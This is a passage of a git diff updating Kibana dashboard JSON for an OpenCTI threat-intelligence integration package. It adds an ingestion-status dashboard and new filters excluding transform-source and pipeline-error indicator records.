"panelIndex": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa", "title": "Indicators by type", - "type": "lens", - "version": "8.7.1" + "type": "lens" } ], "timeRestore": false, "title": "[Logs OpenCTI] Tags \u0026 Quality", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-29T16:55:10.516Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-16T10:44:14.700Z", "id": "ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -1109,17 +1467,17 @@ }, { "id": "logs-*", - "name": "0f1a93c7-ce49-479c-a71d-42b60469bc11:96ae6ce7-f243-42d6-8bb9-de60277b6175", + "name": "0f1a93c7-ce49-479c-a71d-42b60469bc11:611380a6-8061-42ce-af79-e93f22ee5f64", "type": "index-pattern" }, { "id": "logs-*", - "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "name": "0f1a93c7-ce49-479c-a71d-42b60469bc11:4bb48f19-a815-45c3-b9fd-69d30f2c1b8f", "type": "index-pattern" }, { "id": "logs-*", - "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:3c59cfa0-0292-4164-8e1e-5e295c03878a", + "name": "f789b019-a02c-47f1-bfe2-e3ff61d324c2:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", "type": "index-pattern" }, { @@ -1129,7 +1487,17 @@ }, { "id": "logs-*", - "name": "7220547f-a0d6-463a-ab79-55ae71d6b36d:30a35e84-12db-4d04-96a7-730e2be6292f", + "name": "7220547f-a0d6-463a-ab79-55ae71d6b36d:529afafd-9447-4a7e-80ca-3cb28918e388", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7220547f-a0d6-463a-ab79-55ae71d6b36d:290b43ec-97e5-46eb-b7f4-6420595f01d7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7220547f-a0d6-463a-ab79-55ae71d6b36d:6632bf4b-421e-4098-a930-3cddfb30715c", "type": "index-pattern" }, { @@ -1139,7 +1507,17 @@ }, { "id": "logs-*", - "name": "7b259062-abe4-4e8c-83d4-41464e369378:09aab673-4ab7-45ff-a1be-6effcc17a45a", + "name": "7b259062-abe4-4e8c-83d4-41464e369378:477c8a76-447e-42d1-a4db-648ad810bfda", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7b259062-abe4-4e8c-83d4-41464e369378:ae5d2a8e-2cb5-4998-87fd-f2d81a3795d1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7b259062-abe4-4e8c-83d4-41464e369378:77d39d04-7bf8-45ba-97b4-829ff0f2a6b1", "type": "index-pattern" }, { @@ -1149,7 +1527,17 @@ }, { "id": "logs-*", - "name": "aacaa31c-1405-4b13-98cb-ec814db7915d:4899e00d-792d-4c6c-9f4d-cf59dea58b1f", + "name": "aacaa31c-1405-4b13-98cb-ec814db7915d:a8369e4f-1281-4f9a-b443-3632c41c043f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aacaa31c-1405-4b13-98cb-ec814db7915d:925ad221-2903-40e2-b5ab-052b68e6e9bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aacaa31c-1405-4b13-98cb-ec814db7915d:32003949-df5d-4324-80c3-545f27ce763e", "type": "index-pattern" }, { @@ -1159,7 +1547,17 @@ }, { "id": "logs-*", - "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:f8807b7b-8ae7-4a97-bc7a-68651001577f", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:35c49c70-647e-460b-9e06-33d6fa8ea069", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:678016dd-e965-4881-b864-e63ddbdf3a8c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870:8db319a5-f8a5-4387-a461-d3193840b201", "type": "index-pattern" }, { @@ -1169,7 +1567,17 @@ }, { "id": "logs-*", - "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:43144698-c2fc-4373-a3b2-da7a2e126200", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:48725819-5f5e-42ba-af75-b2330782dd81", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:09df8ebb-1c5b-4e74-84bc-b2e8552f9b59", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa:890a47f4-ce5f-4ba9-af99-b2ac92d68c24", "type": "index-pattern" }, { @@ -1188,5 +1596,6 @@ "type": "index-pattern" } ], - "type": "dashboard" -} + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_opencti/kibana/dashboard/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624.json b/packages/ti_opencti/kibana/dashboard/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624.json new file mode 100644 index 00000000000..d4a90a3cd74 --- /dev/null +++ b/packages/ti_opencti/kibana/dashboard/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624.json @@ -0,0 +1,735 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"782a85c3-7390-40db-831f-1de57a7ab792\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"782a85c3-7390-40db-831f-1de57a7ab792\",\"fieldName\":\"threat.indicator.provider\",\"title\":\"Indicator Provider\",\"enhancements\":{}}},\"9c11483b-80c0-47b0-9c38-049b35d37c32\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"9c11483b-80c0-47b0-9c38-049b35d37c32\",\"fieldName\":\"threat.indicator.type\",\"title\":\"Indicator Type\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "### Navigation\n\n[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd) \n[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd) \n**[OpenCTI Ingestion](/app/dashboards#/view/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624)** \n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Ingestion\n\nThis dashboard is useful for understanding ingestion status.\n\nOther dashboards exclude indicator records that are superseded, revoked or expired. Here you can see all source indicators as they are ingested into `logs-ti_opencti.indicator-*`, and compare that with the latest current indicators in `logs-ti_opencti_latest.indicator`.\n \nThe event kind breakdown is useful for detecting ingest errors.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 39, + "i": "7dd4d0ca-2e33-4155-b1aa-7c9d17a5a00c", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "7dd4d0ca-2e33-4155-b1aa-7c9d17a5a00c", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "71b1d087-bce6-4500-b278-55cc0b095db1": { + "columnOrder": [ + "18405c62-12ca-4f52-9dd4-44841611dc48", + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4", + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "columns": { + "18405c62-12ca-4f52-9dd4-44841611dc48": { + "dataType": "string", + "isBucketed": true, + "label": "Top 12 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "7a98f087-f10a-4e9e-b976-19f3106ffc06", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 12 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "7a98f087-f10a-4e9e-b976-19f3106ffc06": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Indicators", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Ingested", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "event.ingested" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "31b6973a-4a2d-4f25-88a4-efee558b9e7d", + "key": "labels.is_ioc_transform_source", + "negate": false, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "e93bb414-ba64-469e-812b-34f59ffb0e46", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.dataset", + "index": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "key": "event.dataset", + "negate": false, + "params": { + "query": "ti_opencti.indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "ti_opencti.indicator" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "18405c62-12ca-4f52-9dd4-44841611dc48", + "xAccessor": "9ac32596-4ad4-43ae-b5f5-76acff8f10c4" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "aeb2eb33-9329-4f94-ba7e-5ca920428cd0", + "w": 38, + "x": 10, + "y": 13 + }, + "panelIndex": "aeb2eb33-9329-4f94-ba7e-5ca920428cd0", + "title": "Source indicators by type (may be superseded, revoked, or expired), logs-ti_opencti.indicator-*", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "71b1d087-bce6-4500-b278-55cc0b095db1": { + "columnOrder": [ + "18405c62-12ca-4f52-9dd4-44841611dc48", + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4", + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "columns": { + "18405c62-12ca-4f52-9dd4-44841611dc48": { + "dataType": "string", + "isBucketed": true, + "label": "Top 12 values of event.kind", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "7a98f087-f10a-4e9e-b976-19f3106ffc06", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 12 + }, + "scale": "ordinal", + "sourceField": "event.kind" + }, + "7a98f087-f10a-4e9e-b976-19f3106ffc06": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Indicators", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Ingested", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "event.ingested" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "e8906063-eeca-4fc1-adb0-6cbeb2e41dcb", + "key": "labels.is_ioc_transform_source", + "negate": false, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.dataset", + "index": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "key": "event.dataset", + "negate": false, + "params": { + "query": "ti_opencti.indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "ti_opencti.indicator" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "colorMapping": { + "assignmentMode": "manual", + "assignments": [ + { + "color": { + "colorIndex": 9, + "paletteId": "eui_amsterdam_color_blind", + "type": "categorical" + }, + "rule": { + "type": "matchExactly", + "values": [ + "pipeline_error" + ] + }, + "touched": true + }, + { + "color": { + "colorIndex": 0, + "paletteId": "eui_amsterdam_color_blind", + "type": "categorical" + }, + "rule": { + "type": "matchExactly", + "values": [ + "enrichment" + ] + }, + "touched": true + } + ], + "colorMode": { + "type": "categorical" + }, + "paletteId": "eui_amsterdam_color_blind", + "specialAssignments": [ + { + "color": { + "colorIndex": 1, + "paletteId": "neutral", + "type": "categorical" + }, + "rule": { + "type": "other" + }, + "touched": false + } + ] + }, + "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "18405c62-12ca-4f52-9dd4-44841611dc48", + "xAccessor": "9ac32596-4ad4-43ae-b5f5-76acff8f10c4" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "2381f558-738c-4609-93ac-eb2bec084210", + "w": 38, + "x": 10, + "y": 0 + }, + "panelIndex": "2381f558-738c-4609-93ac-eb2bec084210", + "title": "Source indicators by event kind (may be superseded, revoked, or expired), logs-ti_opencti.indicator-*", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "71b1d087-bce6-4500-b278-55cc0b095db1": { + "columnOrder": [ + "18405c62-12ca-4f52-9dd4-44841611dc48", + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4", + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "columns": { + "18405c62-12ca-4f52-9dd4-44841611dc48": { + "dataType": "string", + "isBucketed": true, + "label": "Top 11 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": true, + "orderBy": { + "columnId": "7a98f087-f10a-4e9e-b976-19f3106ffc06", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 11 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "7a98f087-f10a-4e9e-b976-19f3106ffc06": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Indicators", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Ingested", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "event.ingested" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "fb055c1d-215d-4df5-9088-83462697c531", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "956c40e1-cde4-4036-a27c-1dfc83403ba5", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.dataset", + "index": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "key": "event.dataset", + "negate": false, + "params": { + "query": "ti_opencti.indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "ti_opencti.indicator" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "18405c62-12ca-4f52-9dd4-44841611dc48", + "xAccessor": "9ac32596-4ad4-43ae-b5f5-76acff8f10c4" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "2fe03a23-200b-4a62-b35e-3a23f634f836", + "w": 38, + "x": 10, + "y": 26 + }, + "panelIndex": "2fe03a23-200b-4a62-b35e-3a23f634f836", + "title": "Latest indicators by type (current and valid), logs-ti_opencti_latest.indicator", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs OpenCTI] Ingestion", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-16T10:40:44.826Z", + "id": "ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "aeb2eb33-9329-4f94-ba7e-5ca920428cd0:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2381f558-738c-4609-93ac-eb2bec084210:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2fe03a23-200b-4a62-b35e-3a23f634f836:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_782a85c3-7390-40db-831f-1de57a7ab792:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_9c11483b-80c0-47b0-9c38-049b35d37c32:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_opencti/kibana/dashboard/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd.json b/packages/ti_opencti/kibana/dashboard/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd.json index dbead28f6de..7846abbc466 100644 --- a/packages/ti_opencti/kibana/dashboard/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd.json +++ b/packages/ti_opencti/kibana/dashboard/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd.json @@ -24,46 +24,10 @@ "useMargins": true }, "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "### Navigation\n\n**[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd)** \n[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd)\n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Overview\n\nThis dashboard provides an overview of indicator data ingested by the OpenCTI integration.\n\nIt also provides breakdowns by provider and indicator type.\n\nThe availability of fields that are specific to particular indicator types can be understood by looking at the \"No oberservables data\" and \"No ECS indicator detail\" metrics. When an indicator in OpenCTI has any related observable object, details from the observable will be stored, and whenever possible, copied to relevant ECS fields.", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 39, - "i": "9457bd9b-5ac6-4ca1-a220-b88f783d1587", - "w": 10, - "x": 0, - "y": 0 - }, - "panelIndex": "9457bd9b-5ac6-4ca1-a220-b88f783d1587", - "type": "visualization", - "version": "8.7.1" - }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -72,7 +36,17 @@ }, { "id": "logs-*", - "name": "5131be68-a318-4ea6-b0d3-ff13d60a044b", + "name": "d958d904-2e66-47f9-835d-d7d4274bba60", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f128baf7-1873-4c4f-ac59-6babd6b3570c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e74cb15a-9673-4c5d-ab61-eef4b0d6e122", "type": "index-pattern" } ], @@ -117,7 +91,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "5131be68-a318-4ea6-b0d3-ff13d60a044b", + "index": "d958d904-2e66-47f9-835d-d7d4274bba60", "key": "event.dataset", "negate": false, "params": { @@ -130,6 +104,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "f128baf7-1873-4c4f-ac59-6babd6b3570c", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "e74cb15a-9673-4c5d-ab61-eef4b0d6e122", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -160,11 +178,12 @@ "panelIndex": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a", "title": "Providers", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -173,7 +192,17 @@ }, { "id": "logs-*", - "name": "914c9b0f-b5f0-4297-9bc3-464839e5f655", + "name": "a87bb3c1-70cd-4f25-bff2-522111d3594f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "15cc137c-faac-4c2b-8839-443fcf171187", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a0f30b01-9408-4857-b68b-23210efa7594", "type": "index-pattern" } ], @@ -218,7 +247,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "914c9b0f-b5f0-4297-9bc3-464839e5f655", + "index": "a87bb3c1-70cd-4f25-bff2-522111d3594f", "key": "event.dataset", "negate": false, "params": { @@ -231,6 +260,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "15cc137c-faac-4c2b-8839-443fcf171187", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "a0f30b01-9408-4857-b68b-23210efa7594", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -261,11 +334,12 @@ "panelIndex": "d6bcf611-47b6-4470-a3f4-1627237dafec", "title": "Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -274,7 +348,17 @@ }, { "id": "logs-*", - "name": "e43361e4-f810-40fb-aab2-c35c5aefce8c", + "name": "06326156-48e6-48bc-a6e4-1dd5bc5995d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4df969ba-a380-437b-8668-2163cc9da588", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9fc159c5-2720-47d9-bed0-105dbbee75c5", "type": "index-pattern" } ], @@ -323,7 +407,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "e43361e4-f810-40fb-aab2-c35c5aefce8c", + "index": "06326156-48e6-48bc-a6e4-1dd5bc5995d9", "key": "event.dataset", "negate": false, "params": { @@ -336,6 +420,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "4df969ba-a380-437b-8668-2163cc9da588", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "9fc159c5-2720-47d9-bed0-105dbbee75c5", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -366,7 +494,7 @@ "panelIndex": "1768437b-561b-4346-8d9f-9194ce3ea104", "title": "Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { @@ -380,7 +508,17 @@ }, { "id": "logs-*", - "name": "5adfe022-e45e-4f3c-be23-7a888352b091", + "name": "39604f43-aabf-4abd-ae6d-f63d5990afe4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7bef3ba6-908e-42c7-b783-dee88aa984e4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e148e4b0-9ea8-426e-9bb2-cf09d8576934", "type": "index-pattern" } ], @@ -445,7 +583,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "5adfe022-e45e-4f3c-be23-7a888352b091", + "index": "39604f43-aabf-4abd-ae6d-f63d5990afe4", "key": "event.dataset", "negate": false, "params": { @@ -458,6 +596,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "7bef3ba6-908e-42c7-b783-dee88aa984e4", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "e148e4b0-9ea8-426e-9bb2-cf09d8576934", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -489,7 +671,7 